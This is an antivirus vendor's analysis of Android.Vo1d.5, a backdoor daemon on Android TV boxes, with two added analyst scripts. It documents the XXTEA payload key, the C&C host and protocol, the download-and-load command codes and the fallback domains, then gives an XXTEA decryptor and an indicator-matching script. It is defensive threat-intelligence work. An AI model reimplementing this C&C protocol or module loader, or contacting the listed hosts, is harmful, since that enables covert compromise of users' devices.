Android.Vo1d.5

Added to the Dr.Web virus database: 2024-07-26

SHA1 hashes:

  • ed975255eba30345de74936e24b9b3090f26ed7e (/data/google/daemon)
  • 182939085a9aa1d6f0e60da31b200cd644522748 (a decrypted payload)

Description

This is a component of the malicious backdoor Android.Vo1d, which was detected in the system storage area of a number of Android-based TV box models. It is a daemon that performs various tasks on infected devices. Its functionality includes:

  • Decrypting the payload;
  • Communicating with the C&C server;
  • Downloading APK files (presumably);
  • Downloading and running native libraries.

Operating routine

Decrypting the payload

Android.Vo1d.5 carries its payload embedded in its own binary. It extracts the payload and decrypts it with the XXTEA algorithm, using the 32-character key fPNH830ES23QOPIM*&S955(2WR@L*&GF. The decrypted object, the main Android.Vo1d.5 body, is loaded straight into memory rather than written to disk.
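
The following XXTEA encrypt/decrypt helper is an added example for analysts working with this sample; it is not code from the daemon or from Dr.Web. It implements the standard Corrected Block TEA round function, so the same routine can be pointed at the embedded payload (key above) and at the XXTEA-encrypted u and d fields of the C&C responses described further down (session key from the request). Three details are not stated in this write-up and are assumptions here: little-endian 32-bit words, use of the first 16 bytes of the key string as the 128-bit XXTEA key, and zero padding of plaintext to a multiple of 4 bytes with no stored length. If the real sample differs on any of these, the decryptor will produce garbage and the assumption in question has to be revised from the disassembly.

```python
"""XXTEA (Corrected Block TEA) helper for Android.Vo1d.5 analysis.

Added example, not the sample's or Dr.Web's code. Assumptions (not given in
the write-up): little-endian words, key = first 16 bytes of the key string,
plaintext zero-padded to a 4-byte multiple (minimum two words), no length word.
"""
import struct
from typing import List

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF

# Payload key recovered from the daemon (quoted in the write-up).
VO1D_KEY = b"fPNH830ES23QOPIM*&S955(2WR@L*&GF"


def _key_words(key: bytes) -> List[int]:
    # ASSUMPTION: first 16 bytes of the key string as four LE uint32 words;
    # shorter keys (e.g. a short session key) are zero-extended.
    return list(struct.unpack("<4I", key[:16].ljust(16, b"\0")))


def _mx(total: int, y: int, z: int, p: int, e: int, k: List[int]) -> int:
    # XXTEA mixing function. Masking once at the end is sufficient because
    # neither XOR nor addition propagates high bits downward.
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
            ^ ((total ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK


def _encrypt_words(v: List[int], k: List[int]) -> List[int]:
    n = len(v)
    if n < 2:  # XXTEA is undefined for fewer than two words
        return v
    rounds = 6 + 52 // n
    total = 0
    z = v[-1]
    for _ in range(rounds):
        total = (total + DELTA) & MASK
        e = (total >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(total, y, z, p, e, k)) & MASK
            z = v[p]
        y = v[0]
        v[-1] = (v[-1] + _mx(total, y, z, n - 1, e, k)) & MASK
        z = v[-1]
    return v


def _decrypt_words(v: List[int], k: List[int]) -> List[int]:
    n = len(v)
    if n < 2:
        return v
    rounds = 6 + 52 // n
    total = (rounds * DELTA) & MASK  # value of "total" after the last encrypt round
    y = v[0]
    for _ in range(rounds):
        e = (total >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(total, y, z, p, e, k)) & MASK
            y = v[p]
        z = v[-1]
        v[0] = (v[0] - _mx(total, y, z, 0, e, k)) & MASK
        y = v[0]
        total = (total - DELTA) & MASK
    return v


def _to_words(data: bytes) -> List[int]:
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def _to_bytes(words: List[int]) -> bytes:
    return struct.pack("<%dI" % len(words), *words)


def xxtea_encrypt(data: bytes, key: bytes = VO1D_KEY) -> bytes:
    # ASSUMPTION: zero-pad to a 4-byte multiple and to at least 8 bytes.
    pad = -len(data) % 4
    if len(data) + pad < 8:
        pad = 8 - len(data)
    return _to_bytes(_encrypt_words(_to_words(data + b"\0" * pad), _key_words(key)))


def xxtea_decrypt(data: bytes, key: bytes = VO1D_KEY) -> bytes:
    """Decrypt a blob; the caller strips padding, since the sample's scheme is unknown."""
    if len(data) % 4:
        raise ValueError("XXTEA ciphertext length must be a multiple of 4 bytes")
    return _to_bytes(_decrypt_words(_to_words(data), _key_words(key)))


if __name__ == "__main__":
    # Constructed demo input: round-trip a string with the recovered payload key.
    blob = xxtea_encrypt(b"decrypted payload goes here")
    print(blob.hex())
    print(xxtea_decrypt(blob).rstrip(b"\0"))
```

In practice you would read the embedded ciphertext out of /data/google/daemon at the offset the disassembly points to, call `xxtea_decrypt` on it with `VO1D_KEY`, and compare the SHA1 of the result with the decrypted-payload hash listed at the top of this page; a mismatch means one of the stated assumptions (word order, key mapping, padding) does not hold for this build.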

Communicating with the C&C server

Android.Vo1d.5 contacts a C&C server with a POST request; the server address is taken from a built-in list. By default that list contains a single address, hxxp[:]//meiboot[.]com/api/config.

The request format is as follows:

POST hxxp[:]//meiboot[.]com/api/config
User-Agent: curl/7.64.0
Accept: */*
Content-Type: application/json;charset=UTF-8

An example of a request body:

{
    "a": "32",
    "m": "debuggerd-11236.0",
    "s": "10",
    "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"
}

where:

  • a — a constant;
  • m — the name of the process the trojan is running as, followed by its pid and uid, in <process_name>-<pid>.<uid> format (in the example above: process debuggerd, pid 11236, uid 0, i.e. the daemon runs as root);
  • s — a constant;
  • u — a session key; the server uses it to XXTEA-encrypt the u field (a download link) and the d field (a list of C&C addresses) in its responses, which are described below.

The server responds with a JSON in one of several formats.

An example of response #1:


{
    "code": "200",
    "msg": [
        {
            "i": "",
            "v": "",
            "a": "",
            "u": ""
        },
        { ... }
    ]
}

where:

  • i — the identifier of the file to be loaded;
  • v — the version identifier of that file;
  • a — the command code (see the list below);
  • u — the download link for the file, encrypted with XXTEA using the session key from the request.

This response contains the list of commands that the trojan needs to execute.

Possible commands that can be issued by the C&C server:

  • 1 — download a file from the URL in the field u and save it as /data/system/users/.v/<id1>.<id2>;
  • 2 — re-download the file with identifier i;
  • 3 — delete the file with identifier i;
  • 4 — download the file from the URL in the field u and add it to the table under identifier i;
  • 5 — add an already present file to the table under identifier i.

The table referred to in these commands is the daemon's internal list of downloaded files, which a separate thread walks. That thread decrypts each downloaded file and writes the decrypted variant to one of the following locations:

  • /data/system/android.hardware.support@<id>.0.so (for Android API below version 29);
  • <prefix>/lib/arm/libsupport@<id>.0.so

Next, Android.Vo1d.5 loads each of these .so files and runs it by calling the exported function init.

An example of response #2:

{
    "code": "200",
    "msg": {
        "i": "",
        "d": [
            "url_1",
            "url_2",
            "...",
            "url_n"
        ]
    }
}

where:

  • i — the interval between server requests;
  • d — the list of C&C server addresses. Each string in this list is encrypted with the XXTEA algorithm, using the session key from the request.

This command is used to add more C&C server addresses for the daemon to communicate with.

Replenishing the C&C server address list locally

If Android.Vo1d.5 cannot connect to any of the servers in its address table, it generates several addresses on its own from two built-in lists:

  Server address      Domain
  0a597f79d876441d    com
  57fd438a26874780    xyz
  1e93c45d9b414092    top
  111a2e0d676a4e94    net

Android.Vo1d.5 picks a random entry from the first column, appends a random top-level domain from the second column, and tries to connect to the resulting host. The trojan's authors likely planned to register such domains so that the daemons could keep operating if the listed C&C addresses were blocked.

Artifacts

The Android.Vo1d.5 daemon contains the following source-file path strings, left over from the build and pointing at the developer's environment:

  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/server.c
  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/record_stream.c
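
The script below is an added example, not code from Dr.Web or from the sample, that turns the indicators in this description into checks an incident responder can run: it classifies file paths pulled from a suspect TV box (for example the output of a recursive directory listing) against the locations named above, compares SHA1 digests of collected files with the two listed hashes, recognises the default C&C host and the full set of fallback domains the daemon can generate from its two lists, and parses the beacon body format of the C&C request. The sample paths and the hash check input are constructed for the demonstration; the beacon body is the one quoted on this page. The regular expressions assume the <id> parts of the file names contain no slashes, which the write-up does not state explicitly.

```python
"""Indicator checks for Android.Vo1d.5 (added example, not Dr.Web's code).

Indicator values are taken from the write-up above; sample inputs below are
constructed. Path patterns ASSUME the <id> parts of the file names contain
no '/' characters.
"""
import hashlib
import itertools
import json
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# SHA1 values listed at the top of the description.
KNOWN_SHA1 = {
    "ed975255eba30345de74936e24b9b3090f26ed7e": "Android.Vo1d.5 daemon (/data/google/daemon)",
    "182939085a9aa1d6f0e60da31b200cd644522748": "Android.Vo1d.5 decrypted payload",
}

# On-disk locations named in the description.
PATH_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"^/data/google/daemon$"), "daemon binary"),
    (re.compile(r"^/data/system/users/\.v/[^/.]+\.[^/]+$"), "downloaded module (command 1 drop location)"),
    (re.compile(r"^/data/system/android\.hardware\.support@[^/]+\.0\.so$"), "decrypted module (API < 29)"),
    (re.compile(r"^.*/lib/arm/libsupport@[^/]+\.0\.so$"), "decrypted module (<prefix>/lib/arm)"),
]

DEFAULT_C2 = "meiboot.com"  # refanged from hxxp[:]//meiboot[.]com
FALLBACK_LABELS = ["0a597f79d876441d", "57fd438a26874780", "1e93c45d9b414092", "111a2e0d676a4e94"]
FALLBACK_TLDS = ["com", "xyz", "top", "net"]

# Beacon field m is "<process_name>-<pid>.<uid>".
M_FIELD = re.compile(r"^(?P<name>.+)-(?P<pid>\d+)\.(?P<uid>\d+)$")


def fallback_domains() -> Set[str]:
    """Every label/TLD combination the daemon can try when no listed C&C answers."""
    return {f"{label}.{tld}" for label, tld in itertools.product(FALLBACK_LABELS, FALLBACK_TLDS)}


def is_c2_host(host: str) -> bool:
    """True for the default C&C host, its subdomains, or any generated fallback domain."""
    host = host.lower().rstrip(".")
    return host == DEFAULT_C2 or host.endswith("." + DEFAULT_C2) or host in fallback_domains()


def classify_path(path: str) -> Optional[str]:
    """Return a description if the path matches a Vo1d location, else None."""
    for pattern, label in PATH_PATTERNS:
        if pattern.match(path):
            return label
    return None


def scan_paths(paths: Iterable[str]) -> Dict[str, str]:
    """Map each suspicious path in a listing to its description."""
    return {p: label for p in paths for label in [classify_path(p)] if label}


def match_hashes(files: Dict[str, bytes], known: Dict[str, str] = KNOWN_SHA1) -> Dict[str, str]:
    """Return {path: description} for collected files whose SHA1 is a known indicator."""
    hits = {}
    for path, content in files.items():
        digest = hashlib.sha1(content).hexdigest()
        if digest in known:
            hits[path] = known[digest]
    return hits


def parse_beacon(body: str) -> Optional[dict]:
    """Parse a POST body; return its fields if it has the Vo1d beacon shape, else None.

    Only the key set and the m format are required; a, s and u are returned as seen.
    """
    try:
        obj = json.loads(body)
    except ValueError:
        return None
    if not isinstance(obj, dict) or set(obj) != {"a", "m", "s", "u"}:
        return None
    m = M_FIELD.match(str(obj["m"]))
    if not m:
        return None
    return {"process": m["name"], "pid": int(m["pid"]), "uid": int(m["uid"]),
            "a": obj["a"], "s": obj["s"], "session_key": obj["u"]}


# Beacon body quoted in the description.
SAMPLE_BEACON = '{"a": "32", "m": "debuggerd-11236.0", "s": "10", "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"}'
# Constructed directory listing: three Vo1d locations plus a benign path.
SAMPLE_PATHS = [
    "/data/google/daemon",
    "/data/system/users/.v/1001.3",
    "/data/system/android.hardware.support@1001.0.so",
    "/system/bin/sh",
]

if __name__ == "__main__":
    print(scan_paths(SAMPLE_PATHS))
    print(parse_beacon(SAMPLE_BEACON))
    print(sorted(fallback_domains()))
```

The path and hash checks are meant to run on files pulled off the device (for example with `adb pull`), not on the box itself; the domain set is what you would push to DNS blocklists or sinkhole monitoring, and `parse_beacon` is the shape to look for in proxy or packet-capture logs of JSON POSTs with a curl/7.64.0 User-Agent coming from a TV box.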

Indicators of compromise

News article about the trojan

Treatment recommendations

Android

  1. If your mobile device is working normally, download and install the free anti-virus product Dr.Web for Android Light on it. Run a full scan and follow the recommendations for neutralising the detected threats.
  2. If the mobile device has been locked by a trojan of the Android.Locker family (the screen shows a message about a serious violation of the law or a ransom demand), proceed as follows:
    • boot your smartphone or tablet into safe mode (if you do not know how, consult the device's documentation or contact the manufacturer);
    • then download and install the free anti-virus product Dr.Web for Android Light on the infected device, run a full scan and follow the recommendations for neutralising the detected threats;
    • unplug your device and plug it back in.

Learn more about Dr.Web for Android